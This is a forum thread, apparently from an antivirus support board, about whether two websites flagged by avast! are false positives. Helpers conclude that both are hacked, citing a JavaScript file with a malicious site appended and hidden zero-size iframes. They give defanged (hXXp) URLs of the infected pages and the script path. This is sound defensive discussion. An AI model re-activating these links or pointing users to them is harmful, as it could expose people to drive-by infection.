Author Topic: false positive ?  (Read 4827 times)

0 Members and 1 Guest are viewing this topic.

Offline newkid215

  • Newbie
  • *
  • Posts: 6
false positive ?
« on: December 02, 2010, 05:34:23 PM »
Hello,
Would someone help to identify whether these two sites are actually virus or malware infected or it was false positive?

hxxp://www.preceptgroup.net/     (reported infected by JS:Illredir-CI [Trj])

hxxp://www.premierfitness.ca/overview   (reported infected with HTML:iframe-inf)

I remember that seeing around ten detections of iframe.inf from known business sites.  Is iframe.inf generates many false positive detections?

Some advice please,
Many thanks.  :)
« Last Edit: December 03, 2010, 02:11:14 PM by igor »

Offline Swarnava/Heaven GOD

  • Sr. Member
  • ****
  • Posts: 241
  • Give me the place 2 stand & I shall move the earth
Re: false positive ?
« Reply #1 on: December 02, 2010, 05:52:52 PM »
working fine here..
If java had true garbage collection, most program would delete themselves upon execution

Offline spg SCOTT

  • Massive Poster
  • ****
  • Posts: 4124
  • There is no magic, only lost physics
    • spg SCOTT
Re: false positive ?
« Reply #2 on: December 02, 2010, 06:08:42 PM »
Hi newkid215,

Please can you deactivate the links in your post(change http to hXXp) to prevent others potentially becoming infected.
EDIT: Thanks igor for doing this :)

1
Code: [Select]
hXXp://www.preceptgroup.net/menumachine/precept_drop_downs/menuspecs.js
This javascript file has been hacked, and a malicious site added at the end. It also tries to avoid detection by using port 8080, which obviously doesn't work. (capture.gif)

2
Code: [Select]
hXXp://www.premierfitness.ca/overview
avast! is alerting on a set of iframes that all have zero size (basically hidden). (capture2.gif)

I would say that both sites are infected.

Scott

@Swarnava/Heaven GOD

Based on what?
Why link the siteadvisor green tick?
« Last Edit: December 03, 2010, 07:14:54 PM by spg SCOTT »
“There is a computer disease that anybody who works with computers knows about. It's a very serious disease and it interferes completely with the work. The trouble with computers is that you 'play' with them!”Richard Feynman

Offline Tenko

  • Sr. Member
  • ****
  • Posts: 205
  • Download only known security software.
« Last Edit: December 03, 2010, 01:34:51 PM by Tenko »
WMware:
OS: OpenSUSE 11.3

OS: Win 7
Security: Avast free with OA (onlinearmor)

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 85344
  • No support PMs thanks
Re: false positive ?
« Reply #4 on: December 02, 2010, 06:49:47 PM »
Hello,
Would someone help to identify whether these two sites are actually virus or malware infected or it was false positive?
hXXp://www.preceptgroup.net/     (reported infected by JS:Illredir-CI [Trj])
hXXp://www.premierfitness.ca/overview   (reported infected with HTML:iframe-inf)

I remember that seeing around ten detections of iframe.inf from known business sites.  Is iframe.inf generates many false positive detections?

On the contrary the avast web shield has been extremely accurate in its detections in regard to hacked sites it is IMHO the best, when you consider the slew of hidden iframes to dubious looking domain names, I would say this is a good detection.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 21.5.2470 (build 21.5.6354.675) UI 1.0.646/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline spg SCOTT

  • Massive Poster
  • ****
  • Posts: 4124
  • There is no magic, only lost physics
    • spg SCOTT
Re: false positive ?
« Reply #5 on: December 03, 2010, 01:28:16 PM »
@Tenko,

You have also posted live links to the sites in question, could you please deactivate them, like in DavidR's post.


Please can you deactivate the links in your post(change http to hXXp) to prevent others potentially becomin infected.

Scott
“There is a computer disease that anybody who works with computers knows about. It's a very serious disease and it interferes completely with the work. The trouble with computers is that you 'play' with them!”Richard Feynman

Offline Tenko

  • Sr. Member
  • ****
  • Posts: 205
  • Download only known security software.
Re: false positive ?
« Reply #6 on: December 03, 2010, 01:33:42 PM »
I will change it now SCOTT
WMware:
OS: OpenSUSE 11.3

OS: Win 7
Security: Avast free with OA (onlinearmor)

Offline newkid215

  • Newbie
  • *
  • Posts: 6
Re: false positive ?
« Reply #7 on: December 03, 2010, 04:03:33 PM »
Thank you guys for all the good advices.
Next time will only post hxxp link.

Thanks

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 85344
  • No support PMs thanks
Re: false positive ?
« Reply #8 on: December 03, 2010, 05:23:18 PM »
You're welcome, I trust that you have now found and dealt with the offending scripts and iframe tags.

Then you only have to deal with the exploit that allowed the site to be hacked.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 21.5.2470 (build 21.5.6354.675) UI 1.0.646/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline Swarnava/Heaven GOD

  • Sr. Member
  • ****
  • Posts: 241
  • Give me the place 2 stand & I shall move the earth
Re: false positive ?
« Reply #9 on: December 03, 2010, 06:00:43 PM »
Hi newkid215,

Please can you deactivate the links in your post(change http to hXXp) to prevent others potentially becomin infected.

1
Code: [Select]
hXXp://www.preceptgroup.net/menumachine/precept_drop_downs/menuspecs.js
This javascript file has been hacked, and a malicious site added at the end. It also tries to avoid detection by using port 8080, which obviously doesn't work. (capture.gif)

2
Code: [Select]
hXXp://www.premierfitness.ca/overview
avast! is alerting on a set of iframes that all have zero size (basically hidden). (capture2.gif)

I would say that both sites are infected.

Scott

@Swarnava/Heaven GOD

Based on what?
Why link the siteadvisor green tick?

i scan it specially with macafee & kaspersky..both are working fine :)
If java had true garbage collection, most program would delete themselves upon execution

Offline spg SCOTT

  • Massive Poster
  • ****
  • Posts: 4124
  • There is no magic, only lost physics
    • spg SCOTT
“There is a computer disease that anybody who works with computers knows about. It's a very serious disease and it interferes completely with the work. The trouble with computers is that you 'play' with them!”Richard Feynman